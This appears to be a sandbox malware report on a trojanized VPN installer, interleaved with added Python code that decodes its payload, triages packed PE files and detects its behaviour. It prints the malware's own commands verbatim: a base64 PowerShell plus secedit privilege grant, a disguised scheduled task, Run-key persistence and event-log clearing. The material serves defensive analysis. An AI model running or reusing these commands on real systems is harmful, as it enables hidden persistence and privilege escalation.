Source: Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb source: _P18sPbB.exe, 00000011.00000003.2314228018.0000000003440000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp, iusb3mon.exe, 0000001C.00000003.2353080061.0000000000C30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb% source: _P18sPbB.exe, 00000011.00000003.2314228018.0000000003440000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp, iusb3mon.exe, 0000001C.00000003.2353080061.0000000000C30000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\ProgramData\Program\iusb3mon.exe	Unpacked PE file: 28.2.iusb3mon.exe.6240000.3.unpack
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9AD
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
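What the base64 argument in the two powershell.exe command lines above actually carries, as an added example that is not part of the Joe Sandbox report. The payload is base64 over text, not encryption: a base64 string starting with //4 through //7 decodes to the bytes FF FE, the UTF-16LE byte-order mark, and //5b in particular is FF FE 5B, i.e. BOM followed by "[". The script below reproduces the bytes that [IO.File]::WriteAllBytes drops into %TEMP% as SeDebugPrivilege4.inf, parses them as a secedit security template and lists which principals the [Privilege Rights] section assigns each user right to. The base64 string is copied verbatim from the report; the parser, the helper names and the well-known-SID table are the example's own.

```python
import base64
import codecs
import re

# Base64 argument copied verbatim from the powershell.exe command line in the report.
PAYLOAD_B64 = (
    "//5bAFUAbgBpAGMAbwBkAGUAXQANAAoA"
    "VQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBb"
    "AFYAZQByAHMAaQBvAG4AXQANAAoA"
    "cwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAK"
    "AFIAZQB2AGkAcwBpAG8AbgA9ADEADQAK"
    "AFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBT"
    "AGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA="
)

# Well-known SIDs that typically appear in [Privilege Rights] lines (example's own table).
WELL_KNOWN_SIDS = {
    "S-1-5-18": "NT AUTHORITY\\SYSTEM (LocalSystem)",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-32-544": "BUILTIN\\Administrators",
}


def text_encoding_hint(b64):
    """'//4'..'//7' as the first three base64 characters decode to FF FE, the UTF-16LE BOM."""
    return "utf-16-le" if b64[:3] in ("//4", "//5", "//6", "//7") else "unknown"


def decode_payload(b64):
    """Reproduce the bytes WriteAllBytes drops to disk, then decode them by their BOM."""
    raw = base64.b64decode(b64)
    if raw.startswith(codecs.BOM_UTF16_LE):
        return raw[2:].decode("utf-16-le")
    if raw.startswith(codecs.BOM_UTF8):
        return raw[3:].decode("utf-8")
    return raw.decode("utf-8", "replace")


def parse_inf(text):
    """Minimal parser for secedit template syntax: [Section] headers and key = value lines."""
    sections, current = {}, ""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, {})
            continue
        key, _, value = line.partition("=")
        sections.setdefault(current, {})[key.strip()] = value.strip()
    return sections


def is_secedit_template(sections):
    """secedit only accepts templates whose [Version] carries signature="$CHICAGO$"."""
    return sections.get("Version", {}).get("signature", "").strip('"') == "$CHICAGO$"


def privilege_grants(sections):
    """Map each user right in [Privilege Rights] to its principals ('*SID' or account names, comma-separated)."""
    grants = {}
    for right, value in sections.get("Privilege Rights", {}).items():
        grants[right] = [p.strip().lstrip("*") for p in value.split(",") if p.strip()]
    return grants


def describe(grants):
    return {right: [WELL_KNOWN_SIDS.get(p, p) for p in who] for right, who in grants.items()}


if __name__ == "__main__":
    inf = decode_payload(PAYLOAD_B64)
    sections = parse_inf(inf)
    print(inf)
    print("secedit template:", is_secedit_template(sections))
    for right, who in describe(privilege_grants(sections)).items():
        print(f"{right} -> {', '.join(who)}")
```

The decoded template assigns SeDebugPrivilege (the "Debug programs" user right) to S-1-5-18, LocalSystem, which is the account a service such as the dropped iusb3mon.exe (StartServiceCtrlDispatcherA in the report) would normally run under. secedit /configure with a fresh /db and /overwrite applies the template to the local security policy, so the change survives the Remove-Item that deletes the .inf, .sdb and .log afterwards. On a suspect host, secedit /export /cfg out.inf shows the effective assignment under [Privilege Rights]; with Authorization Policy Change auditing enabled, the assignment is also logged as Security event 4704 (a user right was assigned).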
Source: C:\Users\user\Desktop\Lets-x64.exe	Code function: 0_2_00007FF668851908 LoadLibraryA,GetProcAddress,FreeLibrary,	0_2_00007FF668851908
Source: initial sample	Static PE information: section where entry point is pointing to: .boot
Source: iusb3mon.exe.17.dr	Static PE information: real checksum: 0x2a75f4 should be: 0x2ab94d
Source: irsetup.exe.0.dr	Static PE information: real checksum: 0x4f4144 should be: 0x4f9bcf
Source: _P18sPbB.exe.2.dr	Static PE information: real checksum: 0x2a75f4 should be: 0x2ab94d
Source: irsetup.exe.0.dr	Static PE information: section name: text
Source: _P18sPbB.exe.2.dr	Static PE information: section name:
Source: _P18sPbB.exe.2.dr	Static PE information: section name:
Source: _P18sPbB.exe.2.dr	Static PE information: section name:
Source: _P18sPbB.exe.2.dr	Static PE information: section name:
Source: _P18sPbB.exe.2.dr	Static PE information: section name:
Source: _P18sPbB.exe.2.dr	Static PE information: section name: .winlice
Source: _P18sPbB.exe.2.dr	Static PE information: section name: .boot
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name:
Source: iusb3mon.exe.17.dr	Static PE information: section name: .winlice
Source: iusb3mon.exe.17.dr	Static PE information: section name: .boot
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001C378 push rdx; ret 	2_2_000000018001C381
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001C388 push rdx; ret 	2_2_000000018001C389
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_04C02CD0 pushfd ; ret 	19_2_04C02D51
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_04C02D3F pushfd ; ret 	19_2_04C02D51
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_00227845 push ecx; mov dword ptr [esp], 30CDEC6Ch	28_2_00413361
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_00227845 push esi; mov dword ptr [esp], 30D613B8h	28_2_0041337A
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_00227845 push eax; mov dword ptr [esp], edi	28_2_00413411
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_001D6074 push ecx; ret 	28_2_001D6087
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_06249E44 push eax; ret 	28_2_06249E62
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_06249ED0 push eax; ret 	28_2_06249EFE
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_0625E541 push ebp; retf 	28_2_0625E54C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_0625E548 push ebp; retf 	28_2_0625E54C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_06264000 push ecx; iretd 	28_2_06264021
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_0626404A push es; iretd 	28_2_06264074
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_0625F923 push es; iretd 	28_2_0625F924
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_04D1A48F push eax; ret 	28_2_04D1A4BD
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_04D1A403 push eax; ret 	28_2_04D1A421
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_04D2DD9F push ss; ret 	28_2_04D2DDA2
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_04D2DD63 push edx; ret 	28_2_04D2DD66
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_04D2EB00 push ebp; retf 	28_2_04D2EB0B
Source: _P18sPbB.exe.2.dr	Static PE information: section name: entropy: 7.97489456626239
Source: iusb3mon.exe.17.dr	Static PE information: section name: entropy: 7.97489456626239
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe	File created: C:\ProgramData\Program\iusb3mon.exe
Source: C:\Users\user\Desktop\Lets-x64.exe	File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll
Source: C:\Users\user\Desktop\Lets-x64.exe	File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File created: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File created: C:\Program Files\product1\letsvpn-latest.exe
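A static triage pass that reproduces the checks behind the Data Obfuscation findings above (stored PE checksum differing from the computed one, section names with no printable characters, a section with entropy near 8, and an entry point inside a non-standard section such as .boot), as an added example rather than Joe Sandbox's own code. To run offline it constructs a minimal PE32 in memory; on a real sample pass the file's bytes to triage_sections, entry_section and checksum_matches instead. The checksum routine follows the CheckSumMappedFile algorithm (16-bit sum with end-around carry over the whole file, the CheckSum field itself skipped, folded to 16 bits, plus the file length). The 7.0 entropy threshold and the helper names are the example's own choices.

```python
import math
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"          # IMAGE_SECTION_HEADER, 40 bytes


def build_sample_pe(sections, entry_rva=0x1000):
    """Constructed minimal PE32 for offline testing; not one of the report's files.
    sections: list of (name, raw bytes, Characteristics). CheckSum is left at 0."""
    opt_size = 224
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                # AddressOfEntryPoint
    first_raw = (64 + 4 + 20 + opt_size + 40 * len(sections) + 511) // 512 * 512
    table, raw, ptr, va = b"", b"", first_raw, 0x1000
    for name, data, chars in sections:
        raw_size = (len(data) + 511) // 512 * 512
        table += struct.pack(SECTION_HDR, name, len(data), va, raw_size, ptr, 0, 0, 0, 0, chars)
        raw += data.ljust(raw_size, b"\0")
        ptr += raw_size
        va += (len(data) + 0xFFF) // 0x1000 * 0x1000
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table).ljust(first_raw, b"\0") + raw


def _headers(image):
    """Return (optional header offset, optional header size, number of sections)."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsects = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    return e_lfanew + 24, opt_size, nsects


def shannon_entropy(data):
    n = len(data)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return 0.0 - sum(c / n * math.log2(c / n) for c in counts if c)


def triage_sections(image):
    """One record per section with the properties the report flags as packer indicators."""
    opt_off, opt_size, nsects = _headers(image)
    out = []
    for i in range(nsects):
        name, _, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, image, opt_off + opt_size + 40 * i)
        name = name.rstrip(b"\0")
        ent = shannon_entropy(image[rptr:rptr + rsize])
        out.append({
            "name": name.decode("latin-1"),
            "name_hex": name.hex(),                  # readable even when the name is not printable
            "va": va,
            "printable_name": bool(name) and all(0x21 <= b <= 0x7E for b in name),
            "entropy": round(ent, 2),
            "packed_like": ent > 7.0,                # 7.97 in the report is typical of compressed or encrypted data
            "wx": bool(chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE),
        })
    return out


def entry_section(image):
    """Raw name of the section containing AddressOfEntryPoint (the report: '.boot')."""
    opt_off, opt_size, nsects = _headers(image)
    entry = struct.unpack_from("<I", image, opt_off + 16)[0]
    for i in range(nsects):
        name, vsize, va, rsize, *_ = struct.unpack_from(SECTION_HDR, image, opt_off + opt_size + 40 * i)
        if va <= entry < va + max(vsize, rsize):
            return name.rstrip(b"\0")
    return None


def pe_checksum(image):
    """CheckSumMappedFile: 16-bit sum with end-around carry over the file, skipping the
    4-byte CheckSum field (optional header offset 64), folded to 16 bits, plus the length."""
    opt_off, _, _ = _headers(image)
    skip = {opt_off + 64, opt_off + 66}
    total = 0
    for i in range(0, len(image) - 1, 2):
        if i in skip:
            continue
        total += image[i] | (image[i + 1] << 8)
        total = (total & 0xFFFF) + (total >> 16)
    if len(image) % 2:
        total += image[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + len(image)


def checksum_matches(image):
    opt_off, _, _ = _headers(image)
    return struct.unpack_from("<I", image, opt_off + 64)[0] == pe_checksum(image)


def with_checksum(image):
    opt_off, _, _ = _headers(image)
    fixed = bytearray(image)
    struct.pack_into("<I", fixed, opt_off + 64, pe_checksum(image))
    return bytes(fixed)


if __name__ == "__main__":
    sample = build_sample_pe([(b".text", bytes(range(256)) * 4, 0x60000020),
                              (b"\x80\x80", bytes(1024), 0xE0000020)])
    for s in triage_sections(sample):
        print(s)
    print("entry in", entry_section(sample), "| checksum ok:", checksum_matches(sample))
```

A wrong checksum on its own is weak evidence (many legitimate linkers leave the field zero), but combined with non-printable section names, a near-8 entropy section and an entry point outside .text it matches the profile of the packed droppers listed above.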

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_062467CC shellex,SetThreadExecutionState,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,WinExec,WinExec,WinExec,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,ExitProcess,StartServiceCtrlDispatcherA,Sleep,GetModuleFileNameA,CopyFileA,Sleep,	28_2_062467CC
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_06253F29 IsIconic,GetWindowPlacement,GetWindowRect,	28_2_06253F29
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_06243B39 OpenEventLogA,ClearEventLogA,CloseEventLog,	28_2_06243B39
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 28_2_0624838B CreateThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,	28_2_0624838B
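Detection logic for the persistence and privilege chain this report documents (an installer in AppData\Local\Temp drops _P18sPbB.exe into Users\Public, which writes a Run value named Microsoft and launches powershell.exe with an inline FromBase64String plus secedit /configure, while cmd.exe registers a scheduled task from an XML under ProgramData), as an added example that is not part of the Joe Sandbox report. The telemetry below is constructed here in Sysmon field names (Image, ParentImage, CommandLine, TargetObject) and modelled on the report's process tree; the command lines are shortened, the SecEdit child's resolved %TEMP% paths are assumed, and the rule names are the example's own rather than the titles of Joe's Sigma rules.

```python
import re

# Directories this sample stages and runs payloads from (taken from the report's process tree).
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\programdata\\", "\\appdata\\local\\temp\\")

RULES = {}


def rule(name):
    def register(fn):
        RULES[name] = fn
        return fn
    return register


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def in_suspicious_dir(path):
    return any(d in path.lower() for d in SUSPICIOUS_DIRS)


@rule("process_from_suspicious_dir")
def _(e):
    return e["type"] == "process" and in_suspicious_dir(e["Image"])


@rule("parent_in_suspicious_dir")
def _(e):
    return e["type"] == "process" and in_suspicious_dir(e.get("ParentImage", ""))


@rule("powershell_base64_to_secedit")
def _(e):
    cl = e.get("CommandLine", "").lower()
    return (e["type"] == "process" and basename(e["Image"]) == "powershell.exe"
            and "frombase64string" in cl and "secedit" in cl and "/configure" in cl)


@rule("secedit_template_from_temp")
def _(e):
    # Fires on the secedit child itself, so a dropper that skips PowerShell is still caught.
    cl = e.get("CommandLine", "").lower()
    return (e["type"] == "process" and basename(e["Image"]) == "secedit.exe"
            and "/configure" in cl and re.search(r"/cfg\s+\S*\\temp\\", cl) is not None)


@rule("schtasks_xml_in_programdata")
def _(e):
    cl = e.get("CommandLine", "").lower()
    return (e["type"] == "process" and basename(e["Image"]) == "schtasks.exe"
            and "/create" in cl and re.search(r'/xml\s+"?[a-z]:\\programdata\\', cl) is not None)


@rule("run_key_set_by_suspicious_image")
def _(e):
    return (e["type"] == "registry" and "\\currentversion\\run\\" in e["TargetObject"].lower()
            and in_suspicious_dir(e["Image"]))


def evaluate(events):
    """Return {event index: sorted names of the rules that fired}."""
    return {i: sorted(n for n, fn in RULES.items() if fn(e)) for i, e in enumerate(events)}


# Constructed telemetry (not from the report's raw logs), modelled on its process tree.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r"C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
SAMPLE_EVENTS = [
    {"type": "process", "Image": DROPPER, "CommandLine": DROPPER,
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe"},
    {"type": "process", "Image": PS, "ParentImage": DROPPER,
     "CommandLine": "powershell.exe -NoProfile -C \"[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, "
                    "'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBp...')); "
                    "secedit.exe /configure /db ... /cfg ... /overwrite /quiet; Remove-Item ...\""},
    {"type": "process", "Image": r"C:\Windows\SysWOW64\SecEdit.exe", "ParentImage": PS,   # assumed resolved paths
     "CommandLine": r"secedit.exe /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb "
                    r"/cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /quiet"},
    {"type": "process", "Image": r"C:\Windows\SysWOW64\schtasks.exe", "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml"'},
    {"type": "registry", "Image": DROPPER,
     "TargetObject": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft"},
    {"type": "process", "Image": r"C:\Windows\System32\svchost.exe",                     # benign control event
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for i, hits in evaluate(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["Image"], "->", hits or "-")
```

Each rule is deliberately narrow and independent: the PowerShell, SecEdit and schtasks rules match on the child's own command line rather than on the parent, and the directory rules are kept separate so that a new staging path or a renamed dropper degrades one rule rather than the whole set. Run-key and task-name strings ("Microsoft", "Windows Audio Endpoint Builder( )") are left out of the matching on purpose; they are trivial for the operator to change.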
Source: C:\Users\user\Desktop\Lets-x64.exe	Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
